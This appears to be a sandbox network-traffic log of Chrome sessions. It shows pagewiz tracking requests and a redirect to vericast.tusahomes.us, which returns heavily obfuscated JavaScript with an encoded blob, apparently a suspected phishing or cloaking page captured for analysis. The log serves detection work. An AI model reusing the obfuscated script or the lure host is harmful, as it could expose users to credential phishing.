                                                                2025-04-09 00:18:35 UTC16384INData Raw: 8e 23 05 df eb aa 92 75 e8 f3 60 db 5f 86 d7 0c 2e 6b da 80 ee 5f 7e 7b 9b 76 7f 65 f8 42 6e eb 3b 5b e1 ab 35 38 6a b4 bf cf 84 e3 aa 47 df ec 61 83 ba 2b c4 4a fc fe 07 37 8c 5e ad 05 6d 50 e7 fd d5 4b 01 9f a4 ff 45 da 59 d9 af 11 ff fd c2 57 7d 85 b3 66 d8 95 99 e9 f6 a3 e1 f0 6f 5f dd 0d 8f 9f 8f 83 9b 56 cb 18 01 34 49 08 9e c2 59 2d 28 2e 29 ff 8a a4 54 41 3c 63 0a 39 86 83 0c 88 2e 8c 87 76 36 50 ec c6 28 53 7c 8e 8c 56 d1 d0 fb 12 9b c8 61 8c 5b 7c 92 95 a9 12 3d 3e 63 45 72 0c 03 46 06 c4 0a 3b 92 2f 59 bc 13 d9 a3 e8 13 8a 85 91 a1 b1 c4 9e 16 32 c4 17 31 2e 16 78 76 85 67 a4 0c db 5a 80 fa 3b 15 b5 9e 47 a5 93 7a 7b ed f5 4b 00 bd ed 92 fe 2f e5 55 fd a4 99 cd 1f d5 ee a7 8e 63 44 5e 64 35 4a 7d 04 63 a2 13 1c c4 13 d2 c9 44 03 3c 6b 88 c9 99
                                                                Data Ascii: #u`_.k_~{veBn;[58jGa+J7^mPKEYW}fo_V4IY-(.)TA<c9.v6P(S|Va[|=>cErF;/Y21.xvgZ;Gz{K/UcD^d5J}cD<k
                                                                2025-04-09 00:18:35 UTC16384INData Raw: 14 d3 3f 8d 09 53 57 0b fe 11 1d a9 70 bc a7 29 74 90 80 2f 3f ff c3 60 b0 50 a9 f9 57 99 9d 65 56 27 67 eb 47 e3 2b 61 1c ed 84 cc e9 e2 8c e0 c5 ed af d0 c4 ab f8 52 1c ed eb c0 e9 fa 5c b8 78 fa 28 e7 38 f5 b7 45 3e 4d ea 9b ea a6 e2 9b 7d 59 7f ec 0f ff 3d 21 fa d9 7f 5c bf 49 e6 e3 61 04 89 59 92 3b ae da 38 2f cb 86 e4 21 8d 84 22 66 2a 03 fa 19 72 48 5c 38 75 94 3c 2c c7 2c 0f 0b 08 39 5e c9 f1 e7 0d ff bf 16 fd 7f 4a 41 09 d0 48 dc 60 23 e6 26 c2 a2 82 12 28 f4 ab 85 7f 35 01 a1 90 ff b1 5e 4e 84 7f fd 4e 50 be 1d 1d 51 0b db b9 7f ec 0f ff 55 bf fe 8c ab 50 08 df 34 12 05 95 e4 07 fc a8 69 84 37 f4 b0 7f ea 97 df b0 33 7e 30 48 c3 dc ab b3 13 61 e9 f9 57 21 f3 e8 f3 b0 f8 e0 f7 d8 39 3f e3 9e c2 5b 49 7c f0 43 0b 78 a9 bf 45 37 5b 23 72 59 25 c7
                                                                Data Ascii: ?SWp)t/?`PWeV'gG+aR\x(8E>M}Y=!\IaY;8/!"f*rH\8u<,,9^JAH`#&(5^NNPQUP4i73~0HaW!9?[I|CxE7[#rY%
                                                                2025-04-09 00:18:35 UTC16384INData Raw: 97 91 0f d4 c4 50 d4 5a c5 99 c7 1b 35 47 e5 82 7b 7a 56 77 ec 23 c1 1d ce 0c 92 6c 25 24 30 1c 40 a5 f5 f9 99 b0 3a f9 d0 32 f4 2e dc f8 37 b4 12 8f c1 90 51 28 da e9 32 c8 71 19 fb 06 3f 66 12 ec 22 37 1b c2 52 6d 3a 3c c9 f6 86 2f f0 95 18 c3 bc 69 9d 6d 71 e5 87 d0 61 f0 73 27 56 6b bb da 82 93 f5 e1 9a e9 70 bc 76 3c 9c ad 7d 1e ba c3 9c b5 4c dc 5d b7 c7 5f f0 55 36 9f f1 80 26 18 3a 17 65 84 a7 0d d2 11 fc 24 fe 7a 51 03 5e 5b 8f 65 7c 4e 1f bf 16 5a ce be 4f 28 51 24 53 de d6 3f 11 5e 8f d9 47 fc 6e 74 d7 77 01 f2 f4 07 51 ef d0 f6 7c 02 3e 6d 63 71 ee 63 d3 26 4b 48 27 41 42 99 77 5d c8 cb 01 30 90 82 58 29 fc 3d e0 1f c1 70 0c 1d a6 a3 fc 9a c3 47 90 90 73 6d 03 0b b6 f6 ab 1f 9b b3 75 8a ec e3 75 4d ed a5 e9 5f d0 fe de a6 c9 fe b7 c2 02 5a 99
                                                                Data Ascii: PZ5G{zVw#l%$0@:2.7Q(2q?f"7Rm:</imqas'Vkpv<}L]_U6&:e$zQ^[e|NZO(Q$S?^GntwQ|>mcqc&KH'ABw]0X)=pGsmuuM_Z
                                                                2025-04-09 00:18:35 UTC16384INData Raw: 3f d0 47 9d 73 aa e7 b4 35 5f f9 73 ab c7 86 b9 86 c8 45 32 b9 10 a0 1c 6d c2 99 93 2c a9 3f df 85 f1 e7 ba 57 77 1b f4 d7 84 c3 9d ad b5 23 41 1e 89 21 9c ad d9 91 90 03 7c 30 69 cb 96 58 42 fc 55 49 08 c9 04 ab da 7d 24 d8 91 20 03 74 23 bb 32 35 ad 44 7b d9 4b fc 13 7a 85 fd 27 84 25 d0 4e 58 8b e6 81 a2 51 b6 b9 98 f4 4b 25 a3 bf c3 10 24 84 4a 10 d7 c0 5f 18 7f 46 f8 d7 df e0 23 41 1e 89 61 14 89 c9 51 37 c9 09 3b 12 a1 96 49 2b 53 2d b3 92 e3 b7 b2 bf 1c 8a 84 c3 8b 17 38 ce c3 db ba 15 2f f8 29 e7 ab e8 af 8b f1 09 bd 5f 12 f9 a7 c0 92 c3 0f 13 e7 4a 42 09 2b 9b 73 fd d1 0b 98 f2 fc 29 89 e6 30 15 ac 27 06 bc 16 25 54 7f a1 57 10 ff c2 f4 f7 97 a0 8f bf 92 bc af ba 73 41 d4 0e 9f 9b f4 7f ec 3a 66 64 3a 48 d4 a6 09 7c 24 d4 bf 65 08 79 9d 59 c4 b4
                                                                Data Ascii: ?Gs5_sE2m,?Ww#A!|0iXBUI}$ t#25D{Kz'%NXQK%$J_F#AaQ7;I+S-8/)_JB+s)0'%TWsA:fd:H|$eyY
                                                                2025-04-09 00:18:35 UTC16384INData Raw: e0 2b 76 d8 ee 60 b2 f7 08 a7 78 d1 59 72 27 51 16 65 03 fd fd 07 bf 98 e0 46 59 3f 89 02 f1 c9 f7 df b5 33 4c 70 25 cb 52 30 fc 81 35 e3 df c8 d8 a4 dd c0 a4 49 3e 2d 6a 33 a3 ac 58 cb 39 de 23 3e 69 01 0f c2 f9 fc cb 5f 16 9c c8 3f da 88 da 8a ea 90 22 9a 57 1b c9 0b 0f a1 14 2a d7 84 b2 c5 77 29 c9 23 4a 46 2d 4a b9 e7 21 61 32 aa 05 41 8d c9 a1 22 59 76 96 b4 fd 17 cb 7f d1 4d e1 8f 17 68 27 53 64 74 7f 8e af d0 2d cc f1 14 f9 4d 26 65 33 98 34 79 16 6f c7 30 a9 73 1e fe 92 28 fe cb 74 ec 1c 91 9a ce 33 d1 56 0e 89 4e 16 20 fc 08 8f ee 3b f9 93 82 a4 a8 4d 32 6d 92 0f 88 e7 91 60 b1 59 be 2d 92 9f 3c f6 38 9b 34 ec a5 90 07 85 14 fe e4 07 28 12 44 b8 2b c7 f8 2b d8 0e 3f 50 2f 7c ee a2 fd 07 1f 89 58 98 04 d8 27 2a fa 1d 79 99 5c 73 a0 02 a4 27 b8 27
                                                                Data Ascii: +v`xYr'QeFY?3Lp%R05I>-j3X9#>i_?"W*w)#JF-J!a2A"YvMh'Sdt-M&e34yo0s(t3VN ;M2m`Y-<84(D++?P/|X'*y\s''
                                                                2025-04-09 00:18:35 UTC2120INData Raw: 16 ce dd 0a bf 20 4e 2c 06 b6 12 9b 2d 8a 2b fe 2b fd 31 4e 5a ca 48 b2 68 89 23 49 45 ca a9 e3 af f2 9f ca 7f 19 08 0c 0d a7 94 3a ff d4 f9 b7 ca 1f 55 fe 72 a6 0c 86 c0 0c 59 e5 cf e1 c9 df 91 90 4e b1 23 44 11 99 ae f2 bc c8 16 d1 9c a9 38 28 df bb b1 ca 85 38 8f db f1 44 cf 64 cd ef 7c af bd 9b df 0a 34 b9 e1 52 7e f3 50 67 35 31 a4 1d df aa f0 03 0b 7c 54 fc b7 74 54 e9 af 8e bf ca 7f 2a ff ad f3 4f 9d 7f ab fc 51 e5 2f 85 23 64 03 05 a5 72 84 f8 18 1f 71 ab ca 9f 2d 62 7a be 45 cf 23 91 bf 97 ca 8e 44 74 50 bb 15 ba a6 22 e1 1c 5d 24 5c 57 b9 ac dc 83 5d e7 0d 7a d9 8e f6 81 d2 e1 f9 d3 0b 6c 3e 53 46 6c 46 f0 ab f7 88 c7 7d b0 c2 ef e0 ad c5 4f e2 06 e4 54 fc 07 6e 2a fd e5 f0 ea 1b 64 41 2c 50 4a 1d 7f 95 ff 24 c3 ed f0 91 ca 7f 1d 29 75 fe a9 f3
                                                                Data Ascii: N,-++1NZHh#IE:UrYN#D8(8Dd|4R~Pg51|TtT*OQ/#drq-bzE#DtP"]$\W]zl>SFlF}OTn*dA,PJ$)u


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.54972752.168.137.1444436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:35 UTC657OUTGET /counter.aspx?pageid=648467&isunique=1 HTTP/1.1
                                                                Host: statdumper.pagewiz.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:35 UTC311INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                Set-Cookie: ASP.NET_SessionId=rxguqhj3jkki00mmn2dsydsw; path=/; HttpOnly; SameSite=Lax
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:35 GMT
                                                                Connection: close
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.54972652.168.137.1444436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:35 UTC1224OUTGET /PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1 HTTP/1.1
                                                                Host: stats.pagewiz.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:36 UTC301INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: image/gif
                                                                Server: Microsoft-IIS/10.0
                                                                p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:35 GMT
                                                                Connection: close
                                                                Content-Length: 807
                                                                2025-04-09 00:18:36 UTC807INData Raw: 47 49 46 38 39 61 01 00 01 00 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: GIF89a


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.54972852.168.137.1444436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:36 UTC423OUTGET /counter.aspx?pageid=648467&isunique=1 HTTP/1.1
                                                                Host: statdumper.pagewiz.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:36 UTC311INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                Set-Cookie: ASP.NET_SessionId=ichemhlqagqwg4n5oso4rffh; path=/; HttpOnly; SameSite=Lax
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:35 GMT
                                                                Connection: close
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.54973052.168.137.1444436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:36 UTC990OUTGET /PWPixel.aspx?guid=f24cc4c2-2ef1-79f4-1744157914689-6fd32dc72398&op=1&pid=648467&refer=&href=http%3A//p1.pagewiz.net/vericastharlandclarke/&hostname=p1.pagewiz.net&referrer=&appCodeName=Mozilla&appName=Netscape&appVersion=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&cookieEnabled=true&language=Mozilla&platform=Win32&userAgent=Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/134.0.0.0%20Safari/537.36&screenWidth=1280&screenHeight=1024&uv=1 HTTP/1.1
                                                                Host: stats.pagewiz.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:36 UTC301INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: image/gif
                                                                Server: Microsoft-IIS/10.0
                                                                p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:35 GMT
                                                                Connection: close
                                                                Content-Length: 807
                                                                2025-04-09 00:18:36 UTC807INData Raw: 47 49 46 38 39 61 01 00 01 00 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: GIF89a


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.549733137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:46 UTC765OUTGET /?vffzw9n=Y2Y4NGIwYjU5NTVmNDk0YzkxMmQ1OThhMjBmZGRjMzg%3D HTTP/1.1
                                                                Host: vericast.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-User: ?1
                                                                Sec-Fetch-Dest: document
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:47 UTC177INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:18:47 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 355354
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                2025-04-09 00:18:47 UTC14343INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 49 29 7b 76 61 72 20 70 6a 3d 61 30 70 2c 47 3d 6b 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 70 3d 2d 70 61 72 73 65 49 6e 74 28 70 6a 28 30 78 34 35 61 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 70 6a 28 30 78 31 30 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 70 6a 28 30 78 32 64 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 70 6a 28 30 78 66 38 29 29 2f 30 78 34 29 2b 70 61 72 73 65 49 6e 74 28 70 6a 28 30 78 33 37 65 29 29 2f 30 78
                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> (function(k,I){var pj=a0p,G=k();while(!![]){try{var p=-parseInt(pj(0x45a))/0x1+-parseInt(pj(0x10b))/0x2+-parseInt(pj(0x2da))/0x3*(-parseInt(pj(0xf8))/0x4)+parseInt(pj(0x37e))/0x
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 78 33 65 30 29 5d 26 26 28 63 4d 28 30 78 33 32 39 29 69 6e 28 47 49 3d 5b 5d 5b 63 4d 28 30 78 33 65 30 29 5d 28 29 29 3f 28 47 6b 3d 47 6e 28 47 6e 28 47 49 29 29 29 21 3d 3d 4f 62 6a 65 63 74 5b 63 4d 28 30 78 32 31 66 29 5d 26 26 28 47 39 3d 47 6b 29 3a 47 76 3d 21 30 78 30 29 2c 21 47 63 28 47 39 29 7c 7c 47 47 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 7a 3d 63 4d 3b 69 66 28 63 7a 28 30 78 31 65 39 29 3d 3d 3d 27 62 47 46 5a 51 27 29 7b 66 6f 72 28 76 61 72 20 47 6a 3d 5b 5d 2c 47 59 3d 30 78 30 3b 47 59 3c 6b 61 5b 63 7a 28 30 78 34 36 34 29 5d 3b 2b 2b 47 59 29 7b 76 61 72 20 47 69 3d 6b 45 5b 47 59 5d 3b 47 6a 5b 63 7a 28 30 78 33 33 35 29 5d 28 7b 27 74 79 70 65 27 3a 47 69 5b 63 7a 28 30 78 32 65 30 29 5d 2c 27 73 75 66 66 69 78 65 73
                                                                Data Ascii: x3e0)]&&(cM(0x329)in(GI=[][cM(0x3e0)]())?(Gk=Gn(Gn(GI)))!==Object[cM(0x21f)]&&(G9=Gk):Gv=!0x0),!Gc(G9)||GG(function(){var cz=cM;if(cz(0x1e9)==='bGFZQ'){for(var Gj=[],GY=0x0;GY<ka[cz(0x464)];++GY){var Gi=kE[GY];Gj[cz(0x335)]({'type':Gi[cz(0x2e0)],'suffixes
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 46 6f 72 6d 45 6c 65 6d 65 6e 74 27 3a 30 78 30 2c 27 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 27 3a 30 78 30 2c 27 4d 65 64 69 61 4c 69 73 74 27 3a 30 78 30 2c 27 4d 69 6d 65 54 79 70 65 41 72 72 61 79 27 3a 30 78 30 2c 27 4e 61 6d 65 64 4e 6f 64 65 4d 61 70 27 3a 30 78 30 2c 27 4e 6f 64 65 4c 69 73 74 27 3a 30 78 31 2c 27 50 61 69 6e 74 52 65 71 75 65 73 74 4c 69 73 74 27 3a 30 78 30 2c 27 50 6c 75 67 69 6e 27 3a 30 78 30 2c 27 50 6c 75 67 69 6e 41 72 72 61 79 27 3a 30 78 30 2c 27 53 56 47 4c 65 6e 67 74 68 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 4e 75 6d 62 65 72 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 50 61 74 68 53 65 67 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 50 6f 69 6e 74 4c 69 73 74 27 3a 30 78 30 2c 27 53 56 47 53 74 72 69 6e 67
                                                                Data Ascii: FormElement':0x0,'HTMLSelectElement':0x0,'MediaList':0x0,'MimeTypeArray':0x0,'NamedNodeMap':0x0,'NodeList':0x1,'PaintRequestList':0x0,'Plugin':0x0,'PluginArray':0x0,'SVGLengthList':0x0,'SVGNumberList':0x0,'SVGPathSegList':0x0,'SVGPointList':0x0,'SVGString
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 6e 74 73 29 2c 47 48 3d 47 49 28 47 72 3f 47 65 3a 47 76 2c 6e 75 6c 6c 2c 47 75 29 3b 72 65 74 75 72 6e 20 47 61 26 26 55 32 28 30 78 33 64 31 29 3d 3d 74 79 70 65 6f 66 20 47 48 3f 47 59 28 47 48 2c 47 46 2c 47 4d 29 3a 47 48 3b 7d 7d 29 3b 7d 2c 30 78 31 38 36 39 3a 28 47 36 2c 47 37 2c 47 38 29 3d 3e 7b 76 61 72 20 47 39 3d 47 38 28 30 78 32 31 61 34 29 2c 47 6b 3d 47 38 28 30 78 37 30 66 29 2c 47 49 3d 47 38 28 30 78 31 66 62 38 29 2c 47 47 3d 47 38 28 30 78 34 39 35 29 2c 47 70 3d 47 38 28 30 78 31 30 36 31 29 2c 47 63 3d 47 38 28 30 78 35 65 32 29 3b 47 39 28 7b 27 74 61 72 67 65 74 27 3a 27 50 72 6f 6d 69 73 65 27 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 47 38 28 30 78 35 37 66 29 7d 2c 7b 27 61 6c 6c 27 3a 66 75 6e 63 74
                                                                Data Ascii: nts),GH=GI(Gr?Ge:Gv,null,Gu);return Ga&&U2(0x3d1)==typeof GH?GY(GH,GF,GM):GH;}});},0x1869:(G6,G7,G8)=>{var G9=G8(0x21a4),Gk=G8(0x70f),GI=G8(0x1fb8),GG=G8(0x495),Gp=G8(0x1061),Gc=G8(0x5e2);G9({'target':'Promise','stat':!0x0,'forced':G8(0x57f)},{'all':funct
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 6e 28 29 7b 76 61 72 20 57 45 3d 57 35 2c 70 31 3d 6e 65 77 20 47 39 28 29 2c 70 32 3d 47 4a 28 70 31 29 3b 74 68 69 73 5b 57 45 28 30 78 31 65 66 29 5d 3d 70 31 2c 74 68 69 73 5b 57 45 28 30 78 34 32 61 29 5d 3d 47 62 28 47 6c 2c 70 32 29 2c 74 68 69 73 5b 27 72 65 6a 65 63 74 27 5d 3d 47 62 28 47 50 2c 70 32 29 3b 7d 2c 47 7a 5b 27 66 27 5d 3d 47 77 3d 66 75 6e 63 74 69 6f 6e 28 70 31 29 7b 72 65 74 75 72 6e 20 70 31 3d 3d 3d 47 51 7c 7c 75 6e 64 65 66 69 6e 65 64 3d 3d 3d 70 31 3f 6e 65 77 20 47 6b 28 70 31 29 3a 47 64 28 70 31 29 3b 7d 2c 21 47 70 26 26 47 45 28 47 65 29 26 26 47 74 21 3d 3d 4f 62 6a 65 63 74 5b 57 35 28 30 78 32 31 66 29 5d 29 29 7b 69 66 28 57 35 28 30 78 31 33 32 29 21 3d 3d 57 35 28 30 78 32 63 63 29 29 7b 47 49 3d 47 74 5b 57 35
                                                                Data Ascii: n(){var WE=W5,p1=new G9(),p2=GJ(p1);this[WE(0x1ef)]=p1,this[WE(0x42a)]=Gb(Gl,p2),this['reject']=Gb(GP,p2);},Gz['f']=Gw=function(p1){return p1===GQ||undefined===p1?new Gk(p1):Gd(p1);},!Gp&&GE(Ge)&&Gt!==Object[W5(0x21f)])){if(W5(0x132)!==W5(0x2cc)){GI=Gt[W5
                                                                2025-04-09 00:18:47 UTC16384INData Raw: 41 42 49 41 41 32 41 67 41 67 41 41 30 42 51 66 44 78 77 51 42 42 38 50 48 42 41 43 67 43 41 45 46 2b 49 41 49 6f 41 68 78 33 63 54 59 43 41 41 77 43 43 77 4a 41 41 6b 41 43 51 41 4a 41 41 6b 41 67 42 55 48 30 38 63 45 41 4b 41 49 41 49 67 46 4c 42 45 41 67 42 55 48 34 38 63 45 41 4b 41 49 41 49 67 42 50 42 45 41 67 42 55 47 76 67 41 52 71 51 59 43 41 66 48 45 69 41 6b 45 51 64 6b 41 41 49 51 41 67 43 45 45 45 61 69 49 42 51 51 41 32 41 67 67 67 41 55 45 41 49 41 4a 42 67 49 42 38 63 53 41 41 51 58 39 47 49 67 49 62 4e 67 49 45 49 41 46 42 41 43 41 41 51 52 42 30 49 41 49 62 4e 67 49 41 51 51 41 67 43 43 67 43 42 43 49 42 52 51 30 4a 47 69 41 49 4b 41 49 4d 49 51 5a 42 68 50 4c 42 41 43 41 49 4b 41 49 49 49 67 52 42 68 50 4c 42 41 43 67 43 41 47 6f 69 41
                                                                Data Ascii: ABIAA2AgAgAA0BQfDxwQBB8PHBACgCAEF+IAIoAhx3cTYCAAwCCwJAAkACQAJAAkAgBUH08cEAKAIAIgFLBEAgBUH48cEAKAIAIgBPBEAgBUGvgARqQYCAfHEiAkEQdkAAIQAgCEEEaiIBQQA2AgggAUEAIAJBgIB8cSAAQX9GIgIbNgIEIAFBACAAQRB0IAIbNgIAQQAgCCgCBCIBRQ0JGiAIKAIMIQZBhPLBACAIKAIIIgRBhPLBACgCAGoiA
